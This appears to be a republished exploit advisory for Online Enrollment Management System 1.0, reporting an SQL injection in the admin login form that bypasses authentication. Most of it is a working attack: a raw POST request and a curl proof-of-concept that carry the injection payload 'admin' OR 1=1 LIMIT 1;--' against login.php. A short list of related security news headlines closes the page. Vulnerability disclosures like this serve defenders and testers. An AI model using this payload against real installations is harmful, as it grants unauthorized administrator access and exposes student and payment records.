Online Enrollment Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Admin panel authentication bypassAdmin panel authentication can be bypassed due to a SQL injection in the login form:
Request:
POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 63
Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q
user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=
PoC:
curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
Related posts:
US Health Dept warns of Venus ransomware targeting healthcare orgs
FBI's Email System Hacked to Send Out Fake Cyber Security Alert to Thousands
WP Automatic WordPress plugin hit by millions of SQL injection attacks
Microsoft pulls fix for Outlook bug behind ICS security alerts
ClearFake Campaign Expands to Target Mac Systems with Atomic Stealer